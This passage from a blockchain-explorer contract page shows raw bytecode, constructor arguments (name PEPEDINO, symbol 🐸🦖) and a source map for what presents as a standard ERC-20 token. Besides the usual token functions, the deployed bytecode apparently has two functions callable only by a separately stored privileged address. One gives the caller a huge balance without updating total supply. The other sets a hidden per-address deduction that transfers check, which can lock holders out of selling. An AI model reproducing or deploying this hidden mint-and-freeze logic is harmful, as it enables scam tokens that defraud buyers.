73ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5050565b6108cb610f28565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16141561093b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610932906116a9565b60405180910390fd5b61094481610fa6565b50565b6000808284610956919061181b565b90508381101561099b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610992906116e9565b60405180910390fd5b8091505092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610a1d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a1490611789565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610a8d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a84906116c9565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610b6b91906117c9565b60405180910390a3505050565b6000610b84848461077f565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610c0e5781811015610bf0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610be790611709565b60405180910390fd5b610c0d8484610c08858561106a90919063ffffffff16565b6109ad565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610c84576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c7b90611769565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610cf4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ceb90611689565b60405180910390fd5b6000600760008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490506000610d8c82600360008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461106a90919063ffffffff16565b905082811015610dd1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dc890611729565b60405180910390fd5b610de4838261106a90919063ffffffff16565b600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550610e7983600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461094790919063ffffffff16565b600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610f1991906117c9565b60405180910390a35050505050565b610f306109a5565b73ffffffffffffffffffffffffffffffffffffffff16610f4e6105e4565b73ffffffffffffffffffffffffffffffffffffffff1614610fa4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f9b90611749565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006110ac83836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f7700008152506110b4565b905092915050565b60008383111582906110fc576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110f39190611667565b60405180910390fd5b506000838561110b91906118cb565b9050809150509392505050565b60008135905061112781611a28565b92915050565b60008135905061113c81611a3f565b92915050565b60006020828403121561115457600080fd5b600061116284828501611118565b91505092915050565b6000806040838503121561117e57600080fd5b600061118c85828601611118565b925050602061119d85828601611118565b9150509250929050565b6000806000606084860312156111bc57600080fd5b60006111ca86828701611118565b93505060206111db86828701611118565b92505060406111ec8682870161112d565b9150509250925092565b6000806040838503121561120957600080fd5b600061121785828601611118565b92505060206112288582860161112d565b9150509250929050565b61123b816118ff565b82525050565b61124a81611911565b82525050565b600061125b826117ff565b611265818561180a565b9350611275818560208601611954565b61127e81611a17565b840191505092915050565b600061129660238361180a565b91507f45524332303a207472616e7366657220746f20746865207a65726f206164647260008301527f65737300000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b60006112fc60268361180a565b91507f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008301527f64647265737300000000000000000000000000000000000000000000000000006020830152604082019050919050565b600061136260228361180a565b91507f45524332303a20617070726f766520746f20746865207a65726f20616464726560008301527f73730000000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b60006113c8601b8361180a565b91507f536166654d6174683a206164646974696f6e206f766572666c6f7700000000006000830152602082019050919050565b6000611408601d8361180a565b91507f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006000830152602082019050919050565b600061144860268361180a565b91507f45524332303a207472616e7366657220616d6f756e742065786365656473206260008301527f616c616e636500000000000000000000000000000000000000000000000000006020830152604082019050919050565b60006114ae60208361180a565b91507f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726000830152602082019050919050565b60006114ee60258361180a565b91507f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008301527f64726573730000000000000000000000000000000000000000000000000000006020830152604082019050919050565b600061155460248361180a565b91507f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008301527f72657373000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b60006115ba60258361180a565b91507f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008301527f207a65726f0000000000000000000000000000000000000000000000000000006020830152604082019050919050565b61161c8161193d565b82525050565b61162b81611947565b82525050565b60006020820190506116466000830184611232565b92915050565b60006020820190506116616000830184611241565b92915050565b600060208201905081810360008301526116818184611250565b905092915050565b600060208201905081810360008301526116a281611289565b9050919050565b600060208201905081810360008301526116c2816112ef565b9050919050565b600060208201905081810360008301526116e281611355565b9050919050565b60006020820190508181036000830152611702816113bb565b9050919050565b60006020820190508181036000830152611722816113fb565b9050919050565b600060208201905081810360008301526117428161143b565b9050919050565b60006020820190508181036000830152611762816114a1565b9050919050565b60006020820190508181036000830152611782816114e1565b9050919050565b600060208201905081810360008301526117a281611547565b9050919050565b600060208201905081810360008301526117c2816115ad565b9050919050565b60006020820190506117de6000830184611613565b92915050565b60006020820190506117f96000830184611622565b92915050565b600081519050919050565b600082825260208201905092915050565b60006118268261193d565b91506118318361193d565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115611866576118656119b9565b5b828201905092915050565b600061187c8261193d565b91506118878361193d565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff04831182151516156118c0576118bf6119b9565b5b828202905092915050565b60006118d68261193d565b91506118e18361193d565b9250828210156118f4576118f36119b9565b5b828203905092915050565b600061190a8261191d565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b60005b83811015611972578082015181840152602081019050611957565b83811115611981576000848401525b50505050565b6000600282049050600182168061199f57607f821691505b602082108114156119b3576119b26119e8565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000601f19601f8301169050919050565b611a31816118ff565b8114611a3c57600080fd5b50565b611a488161193d565b8114611a5357600080fd5b5056fea2646970667358221220a17a552743489e7d0d3a2c555216f747368192980e424d1b62a5aa4bc4eeb93264736f6c634300080000330000000000000000000000000000000000000000000000000000000000000040000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000085045504544494e4f0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000008f09f90b8f09fa696000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101165760003560e01c80638da5cb5b116100a2578063a9059cbb11610071578063a9059cbb146102e5578063c65e4d5314610315578063dd62ed3e14610333578063e3412e3d14610363578063f2fde38b1461037f57610116565b80638da5cb5b1461025b57806395d89b4114610279578063a4022bd114610297578063a457c2d7146102b557610116565b8063313ce567116100e9578063313ce567146101b757806339509351146101d55780634ba5d8b51461020557806370a0823114610221578063715018a61461025157610116565b806306fdde031461011b578063095ea7b31461013957806318160ddd1461016957806323b872dd14610187575b600080fd5b61012361039b565b6040516101309190611667565b60405180910390f35b610153600480360381019061014e91906111f6565b61042d565b604051610160919061164c565b60405180910390f35b610171610450565b60405161017e91906117c9565b60405180910390f35b6101a1600480360381019061019c91906111a7565b61045a565b6040516101ae919061164c565b60405180910390f35b6101bf610489565b6040516101cc91906117e4565b60405180910390f35b6101ef60048036038101906101ea91906111f6565b610492565b6040516101fc919061164c565b60405180910390f35b61021f600480360381019061021a91906111f6565b6104c9565b005b61023b60048036038101906102369190611142565b610587565b60405161024891906117c9565b60405180910390f35b6102596105d0565b005b6102636105e4565b6040516102709190611631565b60405180910390f35b61028161060d565b60405161028e9190611667565b60405180910390f35b61029f61069f565b6040516102ac91906117c9565b60405180910390f35b6102cf60048036038101906102ca91906111f6565b6106af565b6040516102dc919061164c565b60405180910390f35b6102ff60048036038101906102fa91906111f6565b610736565b60405161030c919061164c565b60405180910390f35b61031d610759565b60405161032a9190611631565b60405180910390f35b61034d6004803603810190610348919061116b565b61077f565b60405161035a91906117c9565b60405180910390f35b61037d60048036038101906103789190611142565b610806565b005b61039960048036038101906103949190611142565b6108c3565b005b6060600580546103aa90611987565b80601f01602080910402602001604051908101604052809291908181526020018280546103d690611987565b80156104235780601f106103f857610100808354040283529160200191610423565b820191906000526020600020905b81548152906001019060200180831161040657829003601f168201915b5050505050905090565b6000806104386109a5565b90506104458185856109ad565b600191505092915050565b6000600454905090565b6000806104656109a5565b9050610472858285610b78565b61047d858585610c14565b60019150509392505050565b60006012905090565b60008061049d6109a5565b90506104be8185856104af858961077f565b6104b9919061181b565b6109ad565b600191505092915050565b6104d16109a5565b73ffffffffffffffffffffffffffffffffffffffff16600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614156105835760008160016105359190611871565b61053f919061181b565b600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5050565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6105d8610f28565b6105e26000610fa6565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606006805461061c90611987565b80601f016020809104026020016040519081016040528092919081815260200182805461064890611987565b80156106955780601f1061066a57610100808354040283529160200191610695565b820191906000526020600020905b81548152906001019060200180831161067857829003601f168201915b5050505050905090565b6b033b2e3c9fd0803ce800000081565b6000806106ba6109a5565b905060006106c8828661077f565b90508381101561070d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610704906117a9565b60405180910390fd5b61072a8286610725878561106a90919063ffffffff16565b6109ad565b60019250505092915050565b6000806107416109a5565b905061074e818585610c14565b600191505092915050565b600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b60006108106109a5565b90508073ffffffffffffffffffffffffffffffffffffffff16600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614156108bf57710125dfa371a19e6f7cb54395ca0000000000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5050565b6108cb610f28565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16141561093b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610932906116a9565b60405180910390fd5b61094481610fa6565b50565b6000808284610956919061181b565b90508381101561099b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610992906116e9565b60405180910390fd5b8091505092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610a1d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a1490611789565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610a8d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a84906116c9565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610b6b91906117c9565b60405180910390a3505050565b6000610b84848461077f565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610c0e5781811015610bf0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610be790611709565b60405180910390fd5b610c0d8484610c08858561106a90919063ffffffff16565b6109ad565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610c84576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c7b90611769565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610cf4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ceb90611689565b60405180910390fd5b6000600760008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490506000610d8c82600360008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461106a90919063ffffffff16565b905082811015610dd1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dc890611729565b60405180910390fd5b610de4838261106a90919063ffffffff16565b600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550610e7983600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461094790919063ffffffff16565b600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610f1991906117c9565b60405180910390a35050505050565b610f306109a5565b73ffffffffffffffffffffffffffffffffffffffff16610f4e6105e4565b73ffffffffffffffffffffffffffffffffffffffff1614610fa4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f9b90611749565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006110ac83836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f7700008152506110b4565b905092915050565b60008383111582906110fc576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110f39190611667565b60405180910390fd5b506000838561110b91906118cb565b9050809150509392505050565b60008135905061112781611a28565b92915050565b60008135905061113c81611a3f565b92915050565b60006020828403121561115457600080fd5b600061116284828501611118565b91505092915050565b6000806040838503121561117e57600080fd5b600061118c85828601611118565b925050602061119d85828601611118565b9150509250929050565b6000806000606084860312156111bc57600080fd5b60006111ca86828701611118565b93505060206111db86828701611118565b92505060406111ec8682870161112d565b9150509250925092565b6000806040838503121561120957600080fd5b600061121785828601611118565b92505060206112288582860161112d565b9150509250929050565b61123b816118ff565b82525050565b61124a81611911565b82525050565b600061125b826117ff565b611265818561180a565b9350611275818560208601611954565b61127e81611a17565b840191505092915050565b600061129660238361180a565b91507f45524332303a207472616e7366657220746f20746865207a65726f206164647260008301527f65737300000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b60006112fc60268361180a565b91507f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008301527f64647265737300000000000000000000000000000000000000000000000000006020830152604082019050919050565b600061136260228361180a565b91507f45524332303a20617070726f766520746f20746865207a65726f20616464726560008301527f73730000000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b60006113c8601b8361180a565b91507f536166654d6174683a206164646974696f6e206f766572666c6f7700000000006000830152602082019050919050565b6000611408601d8361180a565b91507f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006000830152602082019050919050565b600061144860268361180a565b91507f45524332303a207472616e7366657220616d6f756e742065786365656473206260008301527f616c616e636500000000000000000000000000000000000000000000000000006020830152604082019050919050565b60006114ae60208361180a565b91507f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726000830152602082019050919050565b60006114ee60258361180a565b91507f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008301527f64726573730000000000000000000000000000000000000000000000000000006020830152604082019050919050565b600061155460248361180a565b91507f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008301527f72657373000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b60006115ba60258361180a565b91507f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008301527f207a65726f0000000000000000000000000000000000000000000000000000006020830152604082019050919050565b61161c8161193d565b82525050565b61162b81611947565b82525050565b60006020820190506116466000830184611232565b92915050565b60006020820190506116616000830184611241565b92915050565b600060208201905081810360008301526116818184611250565b905092915050565b600060208201905081810360008301526116a281611289565b9050919050565b600060208201905081810360008301526116c2816112ef565b9050919050565b600060208201905081810360008301526116e281611355565b9050919050565b60006020820190508181036000830152611702816113bb565b9050919050565b60006020820190508181036000830152611722816113fb565b9050919050565b600060208201905081810360008301526117428161143b565b9050919050565b60006020820190508181036000830152611762816114a1565b9050919050565b60006020820190508181036000830152611782816114e1565b9050919050565b600060208201905081810360008301526117a281611547565b9050919050565b600060208201905081810360008301526117c2816115ad565b9050919050565b60006020820190506117de6000830184611613565b92915050565b60006020820190506117f96000830184611622565b92915050565b600081519050919050565b600082825260208201905092915050565b60006118268261193d565b91506118318361193d565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115611866576118656119b9565b5b828201905092915050565b600061187c8261193d565b91506118878361193d565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff04831182151516156118c0576118bf6119b9565b5b828202905092915050565b60006118d68261193d565b91506118e18361193d565b9250828210156118f4576118f36119b9565b5b828203905092915050565b600061190a8261191d565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b60005b83811015611972578082015181840152602081019050611957565b83811115611981576000848401525b50505050565b6000600282049050600182168061199f57607f821691505b602082108114156119b3576119b26119e8565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000601f19601f8301169050919050565b611a31816118ff565b8114611a3c57600080fd5b50565b611a488161193d565b8114611a5357600080fd5b5056fea2646970667358221220a17a552743489e7d0d3a2c555216f747368192980e424d1b62a5aa4bc4eeb93264736f6c63430008000033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

0000000000000000000000000000000000000000000000000000000000000040000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000085045504544494e4f0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000008f09f90b8f09fa696000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : name_ (string): PEPEDINO
Arg [1] : symbol_ (string): 🐸🦖

-----Encoded View---------------
6 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000040
Arg [1] : 0000000000000000000000000000000000000000000000000000000000000080
Arg [2] : 0000000000000000000000000000000000000000000000000000000000000008
Arg [3] : 5045504544494e4f000000000000000000000000000000000000000000000000
Arg [4] : 0000000000000000000000000000000000000000000000000000000000000008
Arg [5] : f09f90b8f09fa696000000000000000000000000000000000000000000000000


Deployed Bytecode Sourcemap

12285:11580:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;13167:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;15529:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14296:108;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;16310:261;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14138:93;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;16980:238;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;18640:162;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;14467:129;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10136:103;;;:::i;:::-;;9484:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13386:104;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12580:57;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;17721:401;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14802:193;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12458:24;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;15058:151;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;18810:219;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;10394:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;13167:100;13221:13;13254:5;13247:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;13167:100;:::o;15529:201::-;15612:4;15629:13;15645:12;:10;:12::i;:::-;15629:28;;15668:32;15677:5;15684:7;15693:6;15668:8;:32::i;:::-;15718:4;15711:11;;;15529:201;;;;:::o;14296:108::-;14357:7;14384:12;;14377:19;;14296:108;:::o;16310:261::-;16407:4;16424:15;16442:12;:10;:12::i;:::-;16424:30;;16465:38;16481:4;16487:7;16496:6;16465:15;:38::i;:::-;16514:27;16524:4;16530:2;16534:6;16514:9;:27::i;:::-;16559:4;16552:11;;;16310:261;;;;;:::o;14138:93::-;14196:5;14221:2;14214:9;;14138:93;:::o;16980:238::-;17068:4;17085:13;17101:12;:10;:12::i;:::-;17085:28;;17124:64;17133:5;17140:7;17177:10;17149:25;17159:5;17166:7;17149:9;:25::i;:::-;:38;;;;:::i;:::-;17124:8;:64::i;:::-;17206:4;17199:11;;;16980:238;;;;:::o;18640:162::-;18725:12;:10;:12::i;:::-;18713:24;;:8;;;;;;;;;;;:24;;;18709:86;;;18782:1;18771:8;18767:1;:12;;;;:::i;:::-;:16;;;;:::i;:::-;18754:5;:10;18760:3;18754:10;;;;;;;;;;;;;;;:29;;;;18709:86;18640:162;;:::o;14467:129::-;14541:7;14568:11;:20;14580:7;14568:20;;;;;;;;;;;;;;;;14561:27;;14467:129;;;:::o;10136:103::-;9366:17;:15;:17::i;:::-;10201:30:::1;10228:1;10201:18;:30::i;:::-;10136:103::o:0;9484:87::-;9530:7;9557:6;;;;;;;;;;;9550:13;;9484:87;:::o;13386:104::-;13442:13;13475:7;13468:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;13386:104;:::o;12580:57::-;12616:21;12580:57;:::o;17721:401::-;17814:4;17831:13;17847:12;:10;:12::i;:::-;17831:28;;17870:24;17897:25;17907:5;17914:7;17897:9;:25::i;:::-;17870:52;;17961:15;17941:16;:35;;17933:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;18029:63;18038:5;18045:7;18054:37;18075:15;18054:16;:20;;:37;;;;:::i;:::-;18029:8;:63::i;:::-;18110:4;18103:11;;;;17721:401;;;;:::o;14802:193::-;14881:4;14898:13;14914:12;:10;:12::i;:::-;14898:28;;14937;14947:5;14954:2;14958:6;14937:9;:28::i;:::-;14983:4;14976:11;;;14802:193;;;;:::o;12458:24::-;;;;;;;;;;;;;:::o;15058:151::-;15147:7;15174:11;:18;15186:5;15174:18;;;;;;;;;;;;;;;:27;15193:7;15174:27;;;;;;;;;;;;;;;;15167:34;;15058:151;;;;:::o;18810:219::-;18865:17;18885:12;:10;:12::i;:::-;18865:32;;18924:9;18912:21;;:8;;;;;;;;;;;:21;;;18908:114;;;18969:41;18950:11;:16;18962:3;18950:16;;;;;;;;;;;;;;;:60;;;;18908:114;18810:219;;:::o;10394:201::-;9366:17;:15;:17::i;:::-;10503:1:::1;10483:22;;:8;:22;;;;10475:73;;;;;;;;;;;;:::i;:::-;;;;;;;;;10559:28;10578:8;10559:18;:28::i;:::-;10394:201:::0;:::o;3696:181::-;3754:7;3774:9;3790:1;3786;:5;;;;:::i;:::-;3774:17;;3815:1;3810;:6;;3802:46;;;;;;;;;;;;:::i;:::-;;;;;;;;;3868:1;3861:8;;;3696:181;;;;:::o;8696:98::-;8749:7;8776:10;8769:17;;8696:98;:::o;21456:346::-;21575:1;21558:19;;:5;:19;;;;21550:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;21656:1;21637:21;;:7;:21;;;;21629:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;21740:6;21710:11;:18;21722:5;21710:18;;;;;;;;;;;;;;;:27;21729:7;21710:27;;;;;;;;;;;;;;;:36;;;;21778:7;21762:32;;21771:5;21762:32;;;21787:6;21762:32;;;;;;:::i;:::-;;;;;;;;21456:346;;;:::o;22093:378::-;22194:24;22221:25;22231:5;22238:7;22221:9;:25::i;:::-;22194:52;;22281:17;22261:16;:37;22257:207;;22343:6;22323:16;:26;;22315:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;22398:54;22407:5;22414:7;22423:28;22444:6;22423:16;:20;;:28;;;;:::i;:::-;22398:8;:54::i;:::-;22257:207;22093:378;;;;:::o;19037:634::-;19150:1;19134:18;;:4;:18;;;;19126:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;19227:1;19213:16;;:2;:16;;;;19205:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;19282:17;19302:5;:11;19308:4;19302:11;;;;;;;;;;;;;;;;19282:31;;19324:21;19348:32;19370:9;19348:11;:17;19360:4;19348:17;;;;;;;;;;;;;;;;:21;;:32;;;;:::i;:::-;19324:56;;19416:6;19399:13;:23;;19391:74;;;;;;;;;;;;:::i;:::-;;;;;;;;;19496:25;19514:6;19496:13;:17;;:25;;;;:::i;:::-;19476:11;:17;19488:4;19476:17;;;;;;;;;;;;;;;:45;;;;19594:27;19614:6;19594:11;:15;19606:2;19594:15;;;;;;;;;;;;;;;;:19;;:27;;;;:::i;:::-;19576:11;:15;19588:2;19576:15;;;;;;;;;;;;;;;:45;;;;19652:2;19637:26;;19646:4;19637:26;;;19656:6;19637:26;;;;;;:::i;:::-;;;;;;;;19037:634;;;;;:::o;9649:136::-;9728:12;:10;:12::i;:::-;9717:23;;:7;:5;:7::i;:::-;:23;;;9709:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;9649:136::o;10755:191::-;10829:16;10848:6;;;;;;;;;;;10829:25;;10874:8;10865:6;;:17;;;;;;;;;;;;;;;;;;10929:8;10898:40;;10919:8;10898:40;;;;;;;;;;;;10755:191;;:::o;4160:136::-;4218:7;4245:43;4249:1;4252;4245:43;;;;;;;;;;;;;;;;;:3;:43::i;:::-;4238:50;;4160:136;;;;:::o;4599:192::-;4685:7;4718:1;4713;:6;;4721:12;4705:29;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;4745:9;4761:1;4757;:5;;;;:::i;:::-;4745:17;;4782:1;4775:8;;;4599:192;;;;;:::o;7:139:1:-;;91:6;78:20;69:29;;107:33;134:5;107:33;:::i;:::-;59:87;;;;:::o;152:139::-;;236:6;223:20;214:29;;252:33;279:5;252:33;:::i;:::-;204:87;;;;:::o;297:262::-;;405:2;393:9;384:7;380:23;376:32;373:2;;;421:1;418;411:12;373:2;464:1;489:53;534:7;525:6;514:9;510:22;489:53;:::i;:::-;479:63;;435:117;363:196;;;;:::o;565:407::-;;;690:2;678:9;669:7;665:23;661:32;658:2;;;706:1;703;696:12;658:2;749:1;774:53;819:7;810:6;799:9;795:22;774:53;:::i;:::-;764:63;;720: